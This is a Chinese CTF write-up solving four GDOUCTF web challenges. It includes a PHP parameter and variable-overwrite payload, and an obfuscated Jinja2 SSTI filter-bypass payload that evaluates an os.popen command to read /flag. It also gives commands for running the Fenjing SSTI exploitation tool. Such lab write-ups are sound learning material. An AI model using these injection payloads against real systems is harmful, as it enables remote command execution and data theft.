GDOUCTF web
1、hate eat snake
第一次正式接触这种题,打开页面发现是个贪吃蛇类游戏,审计源码发现snake.js,点开审计后发现,当你坚持时长达到60秒后会显示flag,我的思路是看看代码中有没有分数限制,长度之类的,通过修改其的值来直接回显flag,但我却不知如何下手(第一次做,工具也不太熟悉),接下来参考大佬wp。
先把网页以及js代码下载到本地,审计一下代码,发现给snake设置了初始速度,那我们继续寻找有关snake速度的代码看看
window.onload = function(){
new Snake('eatSnake',10,false);
}
var Snake = function(snakeId,speed,isAuto){
this.width = arguments[3] || 35 ;
this.height = arguments[4] || 35 ;
this.snakeId = snakeId || 'snake' ;
this.Grid = [] ;
this.snakeGrid = [] ;
this.foodGrid = [] ;
this.derectkey = 39 ;
this.goX = 0 ;
this.goY = 0 ;
this.speed = this.oldSpeed = speed || 10 ;
this.stop = true,
this.snakeTimer = null ;
this.isAuto = isAuto || false;
this.init();
this.timeCounter = 0;
this.startTime = 0;
};
发现这里存在速度的自增,那我们直接除掉它,本地运行,控制蛇坚持60s即可(这应该很简单吧0.0)即可得到flag
该有一种,看别人的巧法,在js代码混淆中与有这样一段
if(this['getScore']()>-0x1e9*-0xf+0x5*0x6d+-0x2e*0xaa)return alert(_0x324fcb(0x2d9,0x2c3,0x2db,0x2f3)+'k3r_h0pe_t'+_0xe4a674(0x5a1,0x595,0x59e,0x57c)+'irlfriend}'),![];
将其中改为getscore>0保存,在本地运行可直接得到flag,但我解混淆发现还是看不懂,目前了解是什么加密,猜测就是当分数大于60(可能)就会弹出flag框,那你改为0直接就可以了。
剩下还有一些神奇方法,比如长按空格60s,禁用js等等都可以,大家可以试试
2、受不了一点
<?php
error_reporting(0);
header("Content-type:text/html;charset=utf-8");
if(isset($_POST['gdou'])&&isset($_POST['ctf'])){
$b=$_POST['ctf'];
$a=$_POST['gdou'];
if($_POST['gdou']!=$_POST['ctf'] && md5($a)===md5($b)){
if(isset($_COOKIE['cookie'])){
if ($_COOKIE['cookie']=='j0k3r'){
if(isset($_GET['aaa']) && isset($_GET['bbb'])){
$aaa=$_GET['aaa'];
$bbb=$_GET['bbb'];
if($aaa==114514 && $bbb==114514 && $aaa!=$bbb){
$give = 'cancanwordflag';
$get ='hacker!';
if(!isset($_GET['flag']) && !isset($_POST['flag'])){
die($give);
}
if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){
die($get);
}
foreach ($_POST as $key => $value) {
$$key = $value;
}
foreach ($_GET as $key => $value) {
$$key = $$value;
}
echo $flag;
}else{
echo "洗洗睡吧";
}
}else{
echo "行不行啊细狗";
}
}
}
else {
echo '菜菜';
}
}else{
echo "就这?";
}
}else{
echo "别来沾边";
}
?>
现在复现的时候又懵逼了,我们先一步步看
第一个if,分别传入那两个参数就行,
第二个是md5强绕过,这里采用数组的形式即可,
第三个if,设置cookie值即可,
第四个if令cookie的值为j03kr,
第五个if设置aaa,bbb这两个参数,
第六个if,这里要求他们等于114514同时又不能互相相等,根据PHP特性(字符串的弱比较,因为== 在进行比较的时候,会先将字符串类型转化成相同,再比较),在bbb后面添加字母即可,
第七个if,设置flag的两种传参方式
//这里蒙了,我借鉴大佬的wp,他们说flag的get与post传参随便设置个参数即可,但发现不可以(在比赛当中就可以),不知道复现为啥不行(解决了!这道题在比赛的时候有bug,放入题库的时候修复了)
//分析一下这个if块,它采用了两个foreach循环,目的是想要覆盖flag变量,那么我们便要想法将flag不被覆盖,于是有了下面构造变量的想法
//若添加如下?123=flag&flag=123,因为代码中会对get参数遍历。
当key=123,value=flag时,接下来有$123=$flag,紧接着有key=flag,value=123,便会有(该flag此处代表着get参数)$flag=$123(也就是=$flag(此处的flag是答案字符串,并非get参数)),接着输出$flag,回显flag,除此之外只需要post传参123=flag即可(注意两个froeach循环的value前面的$数量不同,只要仔细分析代码逻辑即可)
总之payload如下:
get:?aaa=114514&bbb=114514a&123=flag&flag=123
post: gdou[]=1&ctf[]=2&123=flag
Cookie: cookie=j0k3r
3、EZ WEB
首页看到,点击看看
提示我们flag在周围,那么看看源码
提示我们在url上添加src,我们访问看看
访问后会下载一个app.py,也就是源码,我们用记事本打开,看第三个路由,我们用put方式访问后面的super...,即可读到flag,直接bp抓包修改
得到flag
4、<ez_ze>
提示我们是ssti注入,但我这块学的太low了(下去一定学!!!),参考大佬wp
法一、参考:CTFshow-370过滤绕过
payload:bp抓包上传即可
{% set one=(a,)|length %}
{% set zero=one-one %}
{% set two=one+one %}
{% set three=one+two %}
{% set four=two*two %}
{% set five=three+two %}
{% set six=three*two %}
{% set seven=one+six %}
{% set eight=four*two %}
{% set nine=one+eight %}
{% set ten=five*two %}
{% set pops=dict(p=a,op=a)|join %}
{% set lo=(x|reject|string|list)|attr(pops)((four)+(two*ten))%}
{% set init=(lo,lo,dict(ini=a,t=a)|join,lo,lo)|join %}
{% set cc=(lo,lo,dict(glo=a,bals=a)|join,lo,lo)|join %}
{% set ccc=(lo,lo,dict(get=a,item=a)|join,lo,lo)|join %}
{% set cccc=(lo,lo,dict(buil=a,tins=a)|join,lo,lo)|join %}
{% set evas=dict(ev=a,al=a)|join %}
{% set chs=dict(ch=a,r=a)|join %}
{% set chr=a|attr(init)|attr(cc)|attr(ccc)(cccc)|attr(ccc)(chs)%}
{% set eval=a|attr(init)|attr(cc)|attr(ccc)(cccc)|attr(ccc)(evas) %}
{% print(eval((chr((five)+(nine*ten)),chr((five)+(nine*ten)),chr((five)+(zero*ten)+(one*ten*ten)),chr((nine)+(zero*ten)+(one*ten*ten)),chr((two)+(one*ten)+(one*ten*ten)),chr((one)+(one*ten)+(one*ten*ten)),chr((four)+(one*ten)+(one*ten*ten)),chr((six)+(one*ten)+(one*ten*ten)),chr((five)+(nine*ten)),chr((five)+(nine*ten)),chr((zero)+(four*ten)),chr((nine)+(three*ten)),chr((one)+(one*ten)+(one*ten*ten)),chr((five)+(one*ten)+(one*ten*ten)),chr((nine)+(three*ten)),chr((one)+(four*ten)),chr((six)+(four*ten)),chr((two)+(one*ten)+(one*ten*ten)),chr((one)+(one*ten)+(one*ten*ten)),chr((two)+(one*ten)+(one*ten*ten)),chr((one)+(zero*ten)+(one*ten*ten)),chr((zero)+(one*ten)+(one*ten*ten)),chr((zero)+(four*ten)),chr((nine)+(three*ten)),chr((nine)+(nine*ten)),chr((seven)+(nine*ten)),chr((six)+(one*ten)+(one*ten*ten)),chr((two)+(three*ten)),chr((seven)+(four*ten)),chr((two)+(zero*ten)+(one*ten*ten)),chr((eight)+(zero*ten)+(one*ten*ten)),chr((seven)+(nine*ten)),chr((three)+(zero*ten)+(one*ten*ten)),chr((nine)+(three*ten)),chr((one)+(four*ten)),chr((six)+(four*ten)),chr((four)+(one*ten)+(one*ten*ten)),chr((one)+(zero*ten)+(one*ten*ten)),chr((seven)+(nine*ten)),chr((zero)+(zero*ten)+(one*ten*ten)),chr((zero)+(four*ten)),chr((one)+(four*ten)))|join)) %}
法二、直接用大佬工具!
手动安装,具体参考:GitHub - Marven11/Fenjing: 一个类似SQLMap的Jinja2 SSTI利用脚本 | A SQLMap-like Jinja2 SSTI cracker
git clone https://github.com/Marven11/Fenjing
cd Fenjing
python -m pip install -r requirements.txt
python -m fenjing scan --url 'http://xxx/'
输入以上命令随后,cat /flag即可得到flag